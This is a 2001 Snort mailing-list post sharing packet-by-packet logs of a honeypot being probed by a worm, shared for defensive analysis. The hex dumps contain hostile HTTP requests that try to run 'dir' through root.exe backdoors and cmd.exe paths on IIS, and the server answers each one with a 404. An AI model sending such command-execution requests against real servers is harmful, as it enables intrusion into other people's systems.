Snort mailing list archives
Packet logs of Concept V.5 infection
From: Steve Halligan <agent33 () geeksquad com>
Date: Tue, 18 Sep 2001 11:12:11 -0500
Here is a packet by packet replay of my honeypot getting infected. I have
the admin.dll file if anyone wants to looks at it.
-Steve
----------------------------------------------------------------------------
--
#(2 - 24924) [2001-09-18 10:04:05] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=26648 flags=0 offset=0 TTL=118 chksum=60286
TCP: port=4493 -> dport: 80 flags=******S* seq=406394821
ack=0 off=6 res=0 win=8192 urp=0 chksum=34070
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25166) [2001-09-18 10:17:12] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=39313 flags=0 offset=0 TTL=118 chksum=47621
TCP: port=3276 -> dport: 80 flags=******S* seq=460999518
ack=0 off=6 res=0 win=8192 urp=0 chksum=21245
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25167) [2001-09-18 10:17:12] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=51456 flags=0 offset=0 TTL=128 chksum=32918
TCP: port=80 -> dport: 3276 flags=***A**S* seq=285290
ack=460999519 off=6 res=0 win=8760 urp=0 chksum=63045
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25168) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=22418 flags=0 offset=0 TTL=119 chksum=64264
TCP: port=3276 -> dport: 80 flags=***A**** seq=460999519
ack=285291 off=5 res=0 win=8760 urp=0 chksum=3587
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25169) [2001-09-18 10:17:13] WEB-IIS CodeRed v2 root.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=112 ID=22674 flags=0 offset=0 TTL=119 chksum=63936
TCP: port=3276 -> dport: 80 flags=***AP*** seq=460999519
ack=285291 off=5 res=0 win=8760 urp=0 chksum=12511
Payload: length = 72
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A lose....
----------------------------------------------------------------------------
--
#(2 - 25170) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=51712 flags=0 offset=0 TTL=128 chksum=32062
TCP: port=80 -> dport: 3276 flags=***AP*** seq=285291
ack=460999591 off=5 res=0 win=8688 urp=0 chksum=50754
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 33 20 47 4D 54 0D 0A 43 16:00:53 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25171) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=51968 flags=0 offset=0 TTL=128 chksum=32410
TCP: port=80 -> dport: 3276 flags=***A***F seq=285895
ack=460999591 off=5 res=0 win=8688 urp=0 chksum=2982
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25172) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30354 flags=0 offset=0 TTL=118 chksum=56584
TCP: port=3276 -> dport: 80 flags=*****R** seq=460999591
ack=0 off=5 res=0 win=0 urp=0 chksum=35438
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25173) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=30610 flags=0 offset=0 TTL=118 chksum=56324
TCP: port=3555 -> dport: 80 flags=******S* seq=461002231
ack=0 off=6 res=0 win=8192 urp=0 chksum=18253
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25174) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=52224 flags=0 offset=0 TTL=128 chksum=32150
TCP: port=80 -> dport: 3555 flags=***A**S* seq=285921
ack=461002232 off=6 res=0 win=8760 urp=0 chksum=59422
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25175) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30866 flags=0 offset=0 TTL=118 chksum=6921
TCP: port=3276 -> dport: 80 flags=*****R** seq=460999591
ack=460999591 off=5 res=0 win=0 urp=0 chksum=9037
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25176) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=39058 flags=0 offset=0 TTL=119 chksum=47624
TCP: port=3555 -> dport: 80 flags=***A**** seq=461002232
ack=285922 off=5 res=0 win=8760 urp=0 chksum=65499
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25177) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=110 ID=39314 flags=0 offset=0 TTL=119 chksum=47298
TCP: port=3555 -> dport: 80 flags=***AP*** seq=461002232
ack=285922 off=5 res=0 win=8760 urp=0 chksum=52401
Payload: length = 70
000 : 47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E GET /MSADC/root.
010 : 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F exe?/c+dir HTTP/
020 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
030 : 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F Connnection: clo
040 : 73 65 0D 0A 0D 0A se....
----------------------------------------------------------------------------
--
#(2 - 25178) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=52736 flags=0 offset=0 TTL=128 chksum=31038
TCP: port=80 -> dport: 3555 flags=***AP*** seq=285922
ack=461002302 off=5 res=0 win=8690 urp=0 chksum=46875
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43 16:00:54 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25179) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=52992 flags=0 offset=0 TTL=128 chksum=31386
TCP: port=80 -> dport: 3555 flags=***A***F seq=286526
ack=461002302 off=5 res=0 win=8690 urp=0 chksum=64894
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25180) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=48018 flags=0 offset=0 TTL=118 chksum=38920
TCP: port=3555 -> dport: 80 flags=*****R** seq=461002302
ack=4011519 off=5 res=0 win=0 urp=0 chksum=18564
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25181) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=48274 flags=0 offset=0 TTL=118 chksum=38660
TCP: port=3585 -> dport: 80 flags=******S* seq=461002481
ack=0 off=6 res=0 win=8192 urp=0 chksum=17973
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25182) [2001-09-18 10:17:13] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=53248 flags=0 offset=0 TTL=128 chksum=31126
TCP: port=80 -> dport: 3585 flags=***A**S* seq=286441
ack=461002482 off=6 res=0 win=8760 urp=0 chksum=58622
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25183) [2001-09-18 10:17:13] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=48786 flags=0 offset=0 TTL=118 chksum=54536
TCP: port=3555 -> dport: 80 flags=*****R** seq=461002302
ack=461002302 off=5 res=0 win=0 urp=0 chksum=3336
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25184) [2001-09-18 10:17:14] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=62610 flags=0 offset=0 TTL=119 chksum=24072
TCP: port=3585 -> dport: 80 flags=***A**** seq=461002482
ack=286442 off=5 res=0 win=8760 urp=0 chksum=64699
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25185) [2001-09-18 10:17:14] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=120 ID=62866 flags=0 offset=0 TTL=119 chksum=23736
TCP: port=3585 -> dport: 80 flags=***AP*** seq=461002482
ack=286442 off=5 res=0 win=8760 urp=0 chksum=59489
Payload: length = 80
000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 25186) [2001-09-18 10:17:14] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=53504 flags=0 offset=0 TTL=128 chksum=30270
TCP: port=80 -> dport: 3585 flags=***AP*** seq=286442
ack=461002562 off=5 res=0 win=8680 urp=0 chksum=46075
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43 16:00:54 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25187) [2001-09-18 10:17:14] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=53760 flags=0 offset=0 TTL=128 chksum=30618
TCP: port=80 -> dport: 3585 flags=***A***F seq=287046
ack=461002562 off=5 res=0 win=8680 urp=0 chksum=64094
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25188) [2001-09-18 10:17:14] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=51859 flags=0 offset=0 TTL=118 chksum=35075
TCP: port=3785 -> dport: 80 flags=******S* seq=461004445
ack=0 off=6 res=0 win=8192 urp=0 chksum=15809
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25189) [2001-09-18 10:17:14] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=54016 flags=0 offset=0 TTL=128 chksum=30358
TCP: port=80 -> dport: 3785 flags=***A**S* seq=287413
ack=461004446 off=6 res=0 win=8760 urp=0 chksum=55486
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25192) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=19860 flags=0 offset=0 TTL=119 chksum=1287
TCP: port=3785 -> dport: 80 flags=***A**** seq=461004446
ack=287414 off=5 res=0 win=8760 urp=0 chksum=61563
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25193) [2001-09-18 10:17:15] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=120 ID=20116 flags=0 offset=0 TTL=119 chksum=951
TCP: port=3785 -> dport: 80 flags=***AP*** seq=461004446
ack=287414 off=5 res=0 win=8760 urp=0 chksum=56352
Payload: length = 80
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 25194) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=54528 flags=0 offset=0 TTL=128 chksum=29246
TCP: port=80 -> dport: 3785 flags=***AP*** seq=287414
ack=461004526 off=5 res=0 win=8680 urp=0 chksum=42683
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 35 20 47 4D 54 0D 0A 43 16:00:55 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25195) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=54784 flags=0 offset=0 TTL=128 chksum=29594
TCP: port=80 -> dport: 3785 flags=***A***F seq=288018
ack=461004526 off=5 res=0 win=8680 urp=0 chksum=60958
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25196) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=26260 flags=0 offset=0 TTL=118 chksum=60678
TCP: port=3785 -> dport: 80 flags=*****R** seq=461004526
ack=2073600184 off=5 res=0 win=0 urp=0 chksum=22745
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25197) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=26516 flags=0 offset=0 TTL=118 chksum=60418
TCP: port=3888 -> dport: 80 flags=******S* seq=461005598
ack=0 off=6 res=0 win=8192 urp=0 chksum=14553
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
